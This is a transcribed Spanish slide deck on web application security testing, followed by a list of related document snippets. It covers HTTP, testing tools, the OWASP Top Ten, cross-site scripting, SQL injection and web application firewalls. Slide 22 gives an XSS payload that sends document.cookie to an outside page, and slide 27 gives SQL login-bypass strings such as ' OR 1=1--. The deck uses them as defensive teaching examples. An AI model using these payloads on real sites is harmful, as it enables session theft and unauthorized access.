Testing de Seguridad de Aplicaciones Web
|
|
- Esther Olivares Montero
- hace 8 años
- Vistas:
Transcripción
1 Testing de Seguridad de Aplicaciones Web Julio C. Ardita, CISM. 16 de Noviembre de 2013 Coatzacoalcos - MEXICO
2 Temario - Protocolo HTTP - Herramientas de Testing Web. - Vulnerabilidades más comunes - Web Application Firewall 2
3 Protocolo HTTP 3
4 Arquitectura Web Física 4
5 Arquitectura Web Lógica 5
6 Características del Protocolo HTTP HTTP/1.1 definido en RFC 2616 Métodos: GET, HEAD, POST, OPTIONS, PUT, DELETE, TRACE, CONNECT Encabezado Host : indica el nombre del servidor al cual se le realiza el pedido, permite que se utilicen hosts virtuales. Sin Estado. Conexiones TCP persistentes por defecto. Encabezado Connection : permite forzar el cierre de la conexión una vez obtenida la respuesta. Dos tipos de mensajes: Request y Response. 6
7 Formato del Mensaje HTTP REQUEST MÉTODO <ESPACIO> URI <ESPACIO> VERSIÓN <CRLF> [ENCABEZADOS] <CRLF> [CUERPO DEL MENSAJE] Métodos:, GET, HEAD o POST en HTTP/1.0. GET, HEAD, POST, OPTIONS, PUT, DELETE, TRACE o CONNECT en HTTP/1.1. Versión: HTTP/1.0 o HTTP/1.1 Los Encabezados pueden ser de tres tipos: general, de petición y/o de entidad. URI puede ser: *, URL absoluta, o PATH absoluto. 7
8 Métodos HTTP OPTIONS: Métodos disponibles sobre el recurso especificado. GET: Solicitud del recurso especificado. HEAD: Encabezados del recurso especificado. TRACE: Permite realizar debugging. El servidor responde con el mensaje de solicitud como cuerpo del mensaje de respuesta. POST: Permite enviar información al servidor. PUT: Permite subir los datos al servidor para que sean accedidos a través de la URI especificada. DELETE: Eliminar el recurso indicado. CONNECT: Se utiliza con un servidor Proxy que puede ser utilizado como túnel. 8
9 Ejemplo de un Mensaje HTTP REQUEST GET HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-us; rv:1.7.8) Gecko/ Firefox/1.0.4 (Debian package ) Paros/3.2.2 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,tex t/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Charset: ISO ,utf-8;q=0.7,*;q=0.7 9
10 Formato del Mensaje HTTP RESPONSE VERSIÓN <ESPACIO> CÓDIGO_DE_ESTADO DESCRIP <CRLF> [ENCABEZADOS] <CRLF> [CUERPO DEL MENSAJE] Versión: HTTP/1.0 o HTTP/1.1 El código de estado es un número de tres dígitos que indica el estado de la respuesta. Descrip es una breve frase que explica el código de estado. Los Encabezados pueden ser de tres tipos: general, de respuesta y/o de entidad. 10
11 Ejemplo de un Mensaje HTTP RESPONSE HTTP/ OK Server: Microsoft-IIS/5.0 X-Powered-By: ASP.NET Content-Location: Date: Thu, 30 Jun :33:33 GMT Content-Type: text/html Accept-Ranges: bytes Last-Modified: Tue, 28 Jun :15:58 GMT Content-Length: 577 <html> <head> <title>mi.banco - Pagina Principal</title> <meta http-equiv="content-type" content="text/html; charset=iso "> </head>... 11
12 Códigos de Estado Rango 1xx: Informativos, se recibió el pedido y se está procesando. Rango 2xx: Pedido Exitoso, se recibió el pedido, se comprendió y se acceptó. Rango 3xx: Redirección, se debe realizar otro pedido para completar la solicitud. Rango 4xx: Error del Cliente, la solicitud está mal formulada o no se puede llevar a cabo. Rango 5xx: Error del Servidor, el servidor no pudo completar un solicitud aparentemente válida. 12
13 Códigos de Estado Algunos Ejemplos "200" OK: La solicitud fue exitosa. "301" Moved Permanently: Se le asignó una nueva URI al recurso. "302" Found: El recurso está accesible, temporalmente, en otra URI. "304" Not Modified: No se modificó el recurso desde que el cliente lo accedió. 400" Bad Request: Petición errónea. "401" Unauthorized: No está autorizado a acceder el recurso, se debe enviar los encabezados de autenticación. "403" Forbidden: El servidor comprende la solicitud pero no va a permitir el acceso al recurso. "404" Not Found: Recurso no encontrado. "405" Method Not Allowed: No se permite el uso del método sobre el recurso. "500" Internal Server Error: Error en el servidor al procesar el pedido. "505" HTTP Version not supported: versión HTTP no soportada. 13
14 Manejo de Sesión: Cookies - Mecanismo para el manejo de estado en el protocolo HTTP. - Se define en los RFC 2109, y RFC 2965 añade la versión 2. - Define el encabezado Set-Cookie: Set-Cookie: NAME=nombre; Comment=comentario; Domain=dominio; Max-Age=delta-segundos; Path=path; Secure; Version=version Los campos NAME, y Version son los únicos requeridos. Domain: dominio para el cual la cookie es válida. Max-Age: tiempo de vida, en segundos, de la cookie. Path: especifica el subconjunto de URL s para las que aplica la cookie. Secure: la cookie debe ser manejada de forma segura a definir por el Navegador Web. 14
15 Herramientas de Testing Web 15
16 Proxy Local: Burp Un proxy local permite interceptar los pedidos del navegador y modificarlos. ( 16
17 Scanner de Vulnerabilidades: Nikto Un Scanner de vulnerabilidades analiza el servidor verificando problemas comunes de configuración, versiones desactualizadas o vulnerables, y problemas de seguridad de distintos servidores y aplicaciones Web. ( 17
18 Scanner de Vulnerabilidades: N-Stealth ( 18
19 Vulnerabilides más comunes 19
20 OWASP TOPTEN Nr Vulnerabilidad A1 Cross Site Scripting (XSS) Secuencia de Comandos en Sitios Cruzados A2 Injection Flaws Fallas de Inyección A3 Malicious File Execution Ejecución de ficheros malintencionados A4 Insecure Direct Object Reference Referencia Directa a Objetos Insegura A5 A6 A7 Cross Site Request Forgery (CSRF) Information Leakage and Improper Error Handling Broken Authentication and Session Management Vulnerabilidad de Falsificación de Petición en Sitios Cruzados Revelación de Información y gestión Incorrecta de Errores Pérdida de Autenticación y Gestión de Errores A8 Insecure Cryptographic Storage Almacenamiento criptográfico inseguro A9 Insecure Communications Comunicaciones Inseguras A10 Failure to Restrict URL Access Falla de restricción de acceso a URL 20
21 Cross-Site Scripting Un ataque de Cross-Site Scripting consiste en la inclusión de un script en una página Web que se ejecuta cuando la página es accedida por un usuario
22 Cross-Site Scripting: Qué se puede hacer? Robo de Credenciales: <script>document.location=' +document.cookie</script> El script anterior envía las cookies de quién lo ejecute. Redirección de Cliente: <script>document.location= El script anterior redirecciona al usuario a el sitio especificado. En resumen... Lo que se pueda hacer con Javascript! 22 22
23 Cross-Site Scripting y Phishing Ejemplo: La URL es la del sitio, sin embargo se visualiza otro sitio a través de una vulnerabilidad de XSS 23 23
24 Escalación de Privilegios y Manejo de Sesión Session Prediction: Las aplicaciones vulnerables generan credenciales de autenticación predecibles; permitiendo deducir las credenciales de un usuario autenticado o las que van a ser asignadas al próximo usuario que se autentique. Ejemplo: La cookie asignada a cada usuario se realiza en forma secuencial
25 SQL Injection Es una técnica cuyo objetivo es el de inyectar consultas SQL arbitrarias en páginas vulnerables que interactúan con una Base de Datos, logrando de esta forma obtener, modificar y/o eliminar información sensible. Atacando ciertos motores de Bases de Datos es posible, también, lograr la ejecución de comandos del Sistema Operativo
26 SQL Injection Conceptos Básicos 26 26
27 SQL Injection Demostración: Eludiendo Logins SELECT * FROM Usuarios WHERE Username = luis AND Password = clave SELECT * FROM Usuarios WHERE Username = OR 1=1-- AND Password = aa SELECT * FROM Usuarios WHERE Username = admin -- AND Password = aa 27 27
28 Web Application Firewall 28
29 Qué es WAF? Una WAF es un Firewall de aplicaciones web que funciona a nivel de la capa 7 del modelo OSI. Nos permite frenar intentos de intrusión a nivel de aplicaciones web. Existen varias soluciones: - URLSCAN de Microsoft - Mod_Secuity sobre Apache. - Soluciones comerciales (CISCO, BlueCoat, F5, etc). 29
30 ModSecurity ( Módulo para el servidor Web Apache. Actúa como IDS entre el cliente y el servidor Web; filtra los pedidos en base a expresiones regulares. Nos permite filtrar por: El encabezado HTTP La URL El payload Las acciones permitidas son: Logear el pedido Rechazar el pedido (permite especificar el HTTP status de la respuesta) Redireccioner el pedido Dejar pasar el pedido 30
31 Modos de Operación del WAF Proxy Reverso: Se redirige el tráfico HTTP(S) para que pase a través del WAF que está actuando como un proxy reverso. Es decir, recibe las peticiones HTTP, las resuelve contra los servidores Web y, luego, las reenvía al cliente. Esto le permite procesar los pedidos y las respuesta en busca de ataques o resultados de los ataques. 31
32 Capacidades de Filtrado: Qué puede ver? El WAF puede actuar sobre las siguientes porciones de un pedido HTTP y/o de una respuesta HTTP: Métodos Versión del protocolo Encabezados Cuerpo del mensaje URL Código de respuesta IP Origen MÉTODO <ESPACIO> URI <ESPACIO> VERSIÓN <CRLF> [ENCABEZADOS] <CRLF> [CUERPO DEL MENSAJE] VERSIÓN <ESPACIO> CÓDIGO_DE_ESTADO DESCRIP <CRLF> [ENCABEZADOS] <CRLF> [CUERPO DEL MENSAJE] 32
33 Conclusiones El área de testing de seguridad de aplicaciones web es muy amplio y requiere de conocimientos de redes, bases de datos, sistemas operativos y programación. Se detectan vulnerabilidades de seguridad en el 70% de las aplicaciones web que nosotros hemos evaluado. Es una excelente área para investigar y desarrollarse. 33
34 Testing de Seguridad de Aplicaciones Web Julio C. Ardita, CISM. 16 de Noviembre de 2013 Coatzacoalcos - MEXICO
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones Web Leandro Meiners lmeiners@cybsec cybsec.comcom Septiembre de 2005 Buenos Aires - ARGENTINA Temario Temario Introducción al Protocolo HTTP: Arquitectura, carácterísticas, autenticación,
Más detallesHTTP Introducción. Redes de Datos Ing. Marcelo Utard / Ing. Pablo Ronco FACULTAD DE INGENIERIA UNIVERSIDAD DE BUENOS AIRES
Introducción Protocolo de capa de aplicación utilizado para la transferencia de Recursos u objetos. Opera sobre TCP típicamente en el puerto 80 Simple Stateless Genérico Utiliza las extenciones MIME. Transporte
Más detallesIngeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US
Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal
Más detallesFuncionamiento de Servicios Web, FTP
Funcionamiento de Servicios Web, FTP Tema 2.- Nivel de aplicación en Internet Dr. Daniel Morató Redes de Computadores Ingeniero Técnico en Informática de Gestión, 2º curso Material adaptado del libro Computer
Más detallesVÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso
VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security
Más detallesTema 2 El Servicio Web
Tema 2 El Servicio Web Eduardo Martínez Graciá Humberto Martínez Barberá Departamento de Ingeniería de la Información y las Comunicaciones Universidad de Murcia Introducción Nace en el CERN, en 1989 Surge
Más detallesDESARROLLO DE APLICACIONES PARA LA WEB II
INSTITUTO POLITÉCNICO NACIONAL ESCUELA SUPERIOR DE CÓMPUTO DESARROLLO DE APLICACIONES PARA LA WEB II ENCABEZADOS Y MÉTODOS BELEN HURTADO ORTIZ 2008630140 8CV5 ENCABEZADOS Y MÉTODOS DE HTTP Comandos Comando
Más detallesClase 22 Nivel de Aplicación WWW Tema 6.- Nivel de aplicación en Internet
Clase 22 Nivel de Aplicación WWW Tema 6.- Nivel de aplicación en Internet Dr. Daniel Morató Redes de Computadores Ingeniero Técnico de Telecomunicación Especialidad en Sonido e Imagen 3º curso Temario
Más detallesServicio de publicación de información web (HTTP)
Servicio de publicación de información web (HTTP) La Web es uno de los servicios más comunes en Internet, tanto que se ha convertido en su cara visible para la mayoría de los usuarios. Una página Web empezó
Más detallesAtaques Web Automáticos: Identificación, Engaño y Contraataque
Ataques Web Automáticos: Identificación, Engaño y Contraataque Mariano Nuñez Di Croce mnunez@cybsec cybsec.comcom Noviembre 2005 CIBSI 05 Valparaíso, Chile Agenda - Introducción a las Herramientas Automáticas.
Más detallesCapítulo 2.- Vulnerabilidades en aplicaciones web.
Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como
Más detallesSesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1
Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación
Más detallesHacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet
Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL
Más detallesClase. geniería de la Computación. Departamento de Ciencias e Ing. Diego C. Martínez - DCIC-UNS
Ingeniería de Ap plicaciones Web Clase 2 Diego C. Martínez Departamento de Ciencias e Ing geniería de la Computación Universidad Nacional del Sur Internet y sus servicios Internet define una forma de conexión
Más detallesAGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web
Universidad ORT Uruguay Mejorando la Seguridad en Aplicaciones Web Ing. Cecilia Belletti Ing. Angel Caffa, MSc Ing. Isaac Rodríguez IntegraTICs 7 de diciembre, 2006 AGENDA Introducción La Web Promesas
Más detallesINTERCAMBIO DE OBJETOS
Departament d Arquitectura de Computadors INTERCAMBIO DE OBJETOS HTTP: Hypertext Transfer Protocol Protocolo de comunicaciones estandarizado que comunica servidores, proxies-cachés y clientes. Permite
Más detallesDesarrollo y servicios web
Desarrollo y servicios web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Fin tutorial HTML 2. Nombres de dominio 3. URLs 3 Sesión 4. Método GET - POST Qué haremos hoy? 1. Tipos de solicitudes
Más detallesIntroducción al desarrollo web (idesweb)
Introducción al desarrollo web (idesweb) Práctica 8: PHP 2 (cookies y sesiones) 1. Objetivos Conocer el concepto de cookie y sus posibles usos. Aprender a utilizar las cookies con PHP. Conocer el concepto
Más detallesHTTP. Redes I. Departamento de Sistemas Telemáticos y Computación (GSyC) Noviembre de 2011. GSyC - 2011 HTTP 1
HTTP Redes I Departamento de Sistemas Telemáticos y Computación (GSyC) Noviembre de 2011 GSyC - 2011 HTTP 1 c 2011 Grupo de Sistemas y Comunicaciones. Algunos derechos reservados. Este trabajo se distribuye
Más detallesIntroducción a las Redes de Computadoras. Obligatorio 2 2011
Introducción a las Redes de Computadoras Obligatorio 2 2011 Facultad de Ingeniería Instituto de Computación Departamento de Arquitectura de Sistemas Nota previa - IMPORTANTE Se debe cumplir íntegramente
Más detallesCurso 2008/2009 Arquitecturas Distribuidas 3
II. Cookies 1. Qué son cookies? 2. Funcionamiento de cookies 3. Envío de cookies al cliente 4. Gestión de cookies en el cliente 5. Devolución de cookies al servidor 6. Ejemplos de transacciones con cookies
Más detallesPOLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE
POLICÍA FEDERAL DIVISIÓN CIENTÍFICA COORDINACIÓN PARA LA PREVENCIÓN DE DELITOS ELECTRÓNICOS SEGURIDAD EN APLICACIONES WEB PRIMERA PARTE 1 Obje%vo El asistente aprenderá los conceptos básicos sobre los
Más detallesHyperText Transfer Protocol
HyperText Transfer Protocol Ing. Carlos A. Barcenilla c.a.barcenilla@ieee.org Basado en HTTP Made Really Easy http://www.jmarshall.com/easy/http/ 1 Qué es HTTP? HTTP significa Hypertext Transfer Protocol.
Más detallesTema 4. II - Cookies. Arquitecturas Distribuidas 11/12
Tema 4. II - Cookies Arquitecturas Distribuidas 11/12 1 II. Cookies 1. Necesidad de mantener información de estado y HTTP 2. Sesiones 3. Qué son las cookies? 4. Funcionamiento de cookies 5. Envío de cookies
Más detallesS E G U R I D A D E N A P L I C A C I O N E S W E B
H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A
Más detallesAtaques XSS en Aplicaciones Web
Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted
Más detallesDía 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica
Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica DANIEL FIRVIDA PEREIRA Técnico de seguridad - INTECO-CERT 23 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD
Más detallesRedes de Computadoras Práctica 4: World Wide Web
World Wide Web Redes de Computadoras DCyT, UNQ Redes de Computadoras Práctica 4: World Wide Web Temas PANORAMA DE LA ARQUITECTURA, DOCUMENTOS WEB ESTÁTICOS, DOCUMENTOS WEB DINÁMICOS, HTTP PROTOCOLO DE
Más detallesWeb : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team
Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.
Más detallesHyperText Transfer Protocol
Qué es HTTP? HTTP significa Hypertext Transfer Protocol. HyperText Transfer Protocol Ing. Carlos A. Barcenilla c.a.barcenilla@ieee.org Es el protocolo de red que se utiliza para transferir los archivos
Más detallesSECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP
SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web
Más detallesCRSP - OWASP! Motivación! Arquitectura de despliegue Mod_Security! Conclusiones!!
Motivación Arquitectura de despliegue Mod_Security Conclusiones Introducción Definiciones IT = TI Actores Entes reguladores Clientes Proveedores Población General GRAFO DE INTERRELACIONES DE ACTORES Publicación
Más detallesEnlace web remoto a travez de SSh Juan Badilla Riquelme Anibal Espinoza Moraga Cesar Reyes Pino
Redes de Computadores I Enlace web remoto a travez de SSh Juan Badilla Riquelme Anibal Espinoza Moraga Cesar Reyes Pino Introducción Redes de Computadores I Es trabajo tiene el fin de entregar la información
Más detallesTema 2: Protocolo HTTP.
Tema 2: Protocolo HTTP. 1. Introducción. 2. Mensajes HTTP. 1. Partes del mensaje. 2. Primera línea del mensaje 3. Cabeceras del mensaje. 4. Cuerpo del mensaje. 3. Elementos Avanzados. 1. Cookies 2. Manejo
Más detallesMáster Profesional en Tecnologías de Seguridad. Seguridad en la web
Máster Profesional en Tecnologías de Seguridad Módulo VI - Programación Segura Seguridad en la web @josereyero http://www.reyero.net consulting@reyero.net Seguridad en la Web Introducción y objetivos Programa
Más detallesSeguridad en Sistemas Informáticos (SSI) Programación Segura
1 Seguridad en Sistemas Informáticos (SSI) Programación Segura Carlos Pérez Conde Departament d'informàtica Escola Técnica Superior d'enginyeria Universitat de València 2 Bibliografía específica OWASP
Más detallesWeb: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen
Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.
Más detallesDesarrollo y servicios web
Desarrollo y servicios web Luisa Fernanda Rincón Pérez 2014-2 2 Sesión 3. Arquitectura web básica parte 2 Qué haremos hoy? 3 1. La era post pc 2. Nombres de dominio 3. URL 4.HTTP( GET / POST) La era post-pc
Más detallesATEL ASESORES C.A IP Multimedia Subsystem Prof. Diógenes Marcano
SIP Capítulo 3 Pág. 1 SIP es un protocolo para señalización definido por el IETF según el RFC3261. SIP permite establecer, liberar y modificar sesiones multimedia y está basado en un modelo de transacciones
Más detallesOffensive State Auditoría de Aplicaciones Web
Offensive State Auditoría de Aplicaciones Web Tabla de contenidos Servicio de auditoría en aplicaciones web...3 Por qué?...3 Metodologías...4 Etapas y pruebas a realizar...4 1. Fingerprint del objetivo...4
Más detallesDesarrollo seguro en Drupal. Ezequiel Vázquez De la calle
Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal
Más detalles5.1 Introducción. 5.2 El protocolo HTTP.
TEMA 5:. 5.1 Introducción. Inicialmente la idea del World Wide Web 1 surgió en el laboratorio de altas energías del CERN, el Centro Europeo de Investigación Nuclear. La mayoría de los experimentos, altamente
Más detallesSeguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez
Seguridad en Sitios Web de Alto Tráfico Ing. Enrique Hurtarte Juárez Guatemala, 24 de Julio de 2014 XumaK Quienes somos XumaK es una empresa que fue fundada en 2003 por Marcos Andres como una de las primeras
Más detallesInstalación, creación y configuración del servicio FTP
Instalación, creación y configuración del servicio OBJETIVOS Instalar el servicio de en Windows. Configurar y administrar el Servicio de en Windows. Prueba de acceso desde la LAN al servidor. Apertura
Más detallesGastón Toth gaston.toth@owasp.org. Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia
Gastón Toth gaston.toth@owasp.org Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia Dónde queda OWASP Patagonia? Webapp pentesting...desde un enfoque no muy técnico Penetration testing
Más detallesXPERTO EN DISEÑO DE PÁGINAS WEB
Curso ICA de: EXPERTO EN DISEÑO DE PÁGINAS WEB Módulo 1: Program. cliente: JavaScript Estudia el lenguaje JavaScript para crear guiones o scripts que se incluyen en las páginas web y que son ejecutados
Más detallesConfiguración de Apache
Configuración de Apache Cuando se ha instalado el servidor, hay que configurarlo. Apache incluye por defecto una configuración que arranca el servidor en el puerto TCP por defecto, que es el puerto 80,
Más detallesLOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org
LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES www.owasp.org Quien soy? Ing. Elvin Vidal Mollinedo Mencia Profesional de seguridad + 9 años de experiencia en desarrollo
Más detallesb1010 formas de escribir código (in)seguro
b1010 formas de escribir código (in)seguro 1 Lic. Cristian Borghello, CISSP - MVP www.segu-info.com.ar @seguinfo Temario Redes externas vs internas Bugs simples Validación de archivos XSS y SQL Injection
Más detallesLa web (el servicio WWW)
Introducción Ingeniería de Telecomunicación grex@gsyc.es GSyC, Universidad Rey Juan Carlos 24 de noviembre de 2008 (cc) 2008 Some rights reserved. This work licensed under Creative Commons Attribution-ShareAlike
Más detallesRedes de Computadores II
Redes de Computadores II Capa de Aplicación HTTP Las siguientes láminas son material de apoyo para el estudio de la materia de Redes II. No son un contenido exhaustivo del material. Se recomienda suplementar
Más detallesCapítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN
CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CONCEPTOS DE PRUEBAS DE APLICACIÓN El departamento de Testing se encarga de diseñar, planear y aplicar el rol de pruebas a los sistemas que el PROVEEDOR
Más detallesWEB Y HTTP. HTTP: Hypertext Transfer Protocol [RFC 1945] [RFC 2616] Web Page URL (Uniform/Universal Resource Identifier)
WEB Y HTTP Al comienzo de los 90 Prodigy, america online, compuserve, redes de datos nacionales, x.25, framerelay Télefono 1870, radio/televisión broadcast- 1920, 1930, Web Web: Forms, javascript, java
Más detallesSeguridad en Aplicaciones Web
Seguridad en Aplicaciones Web Fabian Portantier Consultor en Seguridad Informática Instructor y Escritor sobre el tema Coordinador de la Carrera de Seguridad www.portantier.com Aplicaciones Web Actuales
Más detallesCapa de Aplicación (Parte 2 de 2)
Capa de Aplicación (Parte 2 de 2) Redes de Computadoras HTTP (Hypertext Transfer Protocol) 1 Qué es Internet? Internet conecta a un conjunto de redes usando protocolos estándar Protocolos de enrutamiento,
Más detallesProgramación páginas web con ASP.NET 3.5 (C#)
Horas de teoría: 40 Horas de práctica: 40 Programación páginas web con ASP.NET 3.5 (C#) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript
Más detallesFundamentos de programación Estudia las estructuras de control y cómo definir funciones en JavaScript.
Descripción: Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología ASP.NET y el servidor
Más detallesabacformacio@abacformacio.com 1
Programación de páginas web: servidor (ASP.NET) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte servidor con la tecnología ASP.NET y el servidor de bases de datos
Más detallesAnálisis forense técnico en entornos virtuales
Análisis forense técnico en entornos virtuales Julio César Ardita, CISM jardita@cybsec.com Agenda - Riesgos actuales en entornos virtuales - El entorno de virtualización - Dónde están los logs? - Investigación
Más detallesCopyright. INSTRUCTIVO DE CONFIGURACIÓN DE PC s DE CLIENTES CASH MANAGEMENT
Copyright Este es un documento con DERECHOS DE AUTOR RESERVADOS. PROHIBIDA SU REPRODUCCIÓN O UTLIZACIÓN TOTAL O PARCIAL, sin autorización escrita del Gerente General de Banco General Rumiñahui S.A. NOTA
Más detallesCapítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable
Capítulo 3 Diseño del Sistema de Administración de Información de Bajo Costo para un Negocio Franquiciable 1. Introducción. El Sistema de Administración de Información de un Negocio Franquiciable (SAINF)
Más detallesProtocolo HTTP Apache. Servicios HTTP. Esteban De La Fuente Rubio esteban@delaf.cl L A TEX. Universidad Andrés Bello. 17 jun 2011
HTTP esteban@delaf.cl L A TEX Universidad Andrés Bello 17 jun 2011 Tabla de contenidos 1 Protocolo HTTP 2 Protocolo HTTP Hypertext Transfer Protocol. Protocolo utilizado para las transacciones en Internet.
Más detallesWAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting
ARGENTINA COLOMBIA CHILE ESPAÑA EE.UU. MÉXICO PANAMÁ VENEZUELA David del Pozo González dpozog@grupogesfor.com WAPITI Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad Junio 2010 www.gesfor.es
Más detallesabacformacio@abacformacio.com
Programación de páginas web con PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología
Más detallesManual de Webalizer. Sync-Intertainment
Manual de Webalizer Sync-Intertainment ESTADISTICAS WEBALIZER Manual Webalizer Webalizer es un potente programa de estadísticas para su sito web, permite el análisis de los datos obtenidos del log de apache,
Más detallesSERVIDOR WEB MULTIPLATAFORMA CON IMPLEMENTACIÓN CGI
SERVIDOR WEB MULTIPLATAFORMA CON IMPLEMENTACIÓN CGI C.U. Loraine E. Gimson Saravia a, C.U. Julián J. Fernández b L.I.D.T.I. Universidad Nacional de Salta. Facultad de Ciencias Exactas a E-Mail: saraviag@unsa.edu.ar
Más detallesPRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN
PRACTICA CAPITULO 2 MODULO 1 PROTOCOLOS Y LA FUNCIONALIDAD DE LA CAPA DE APLICACIÓN Los protocolos de capa de aplicación de TCP/IP más conocidos son aquellos que proporcionan intercambio de la información
Más detallesCONCLUSIONES 155 A través de cada uno de los capítulos del presente documento se han enumerado una serie herramientas de seguridad que forman parte del sistema de defensa de una red y que, controlan su
Más detallesSu Seguridad es Nuestro Éxito
Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio
Más detallesConcepto de Seguridad de Alto Nivel: A lo largo del curso hemos establecido protecciones en los equipos y en la información que almacenan e
Concepto de Seguridad de Alto Nivel: A lo largo del curso hemos establecido protecciones en los equipos y en la información que almacenan e intercambian. En este último capítulo vamos a abordar los sistemas
Más detallesIptables, herramienta para controlar el tráfico de un servidor
Iptables, herramienta para controlar el tráfico de un servidor La seguridad es punto muy importante a tener en cuenta en cualquier organización de ahí que sea fundamental hacer uso de aquellos mecanismos
Más detallesSeguridad de un Portal
Seguridad de un Portal 5 de noviembre, 2010 Gabriel Fernández NyF@agesic.gub.uy Qué debemos proteger? Información Disponibilidad http://moplincom.moplin.com/wp-content/uploads/2009/08/joke-redes1.jpg 2
Más detallesPROTOCOLO HTTP. Hypertext Transfer Protocol
1 PROTOCOLO HTTP Hypertext Transfer Protocol INTRODUCCIÓN HTTP: HyperText Transfer Protocol Fue desarrollado por el consorcio W3C y la IETF. El protocolo de transferencia de hipertexto es el protocolo
Más detallesSQL INJECTION. Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián. 66.69 Criptografía y Seguridad Informática.
SQL INJECTION Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián Grupo 5 66.69 Criptografía y Seguridad Informática Introducción 2 Ataque basado en inyección de código Explota omisiones
Más detallesSeguridad Informática
Universidad Rey Juan Carlos Grado en Ingeniería Informática Seguridad Informática Curso 2012/13 Prueba 3 - Seguridad en es Lea detenidamente las instrucciones del examen antes de comenzar: El examen consta
Más detallesAspectos Básicos de Networking
Aspectos Básicos de Networking ASPECTOS BÁSICOS DE NETWORKING 1 Sesión No. 4 Nombre: Capa de transporte del modelo OSI Objetivo: Al término de la sesión el participante aplicará las principales características
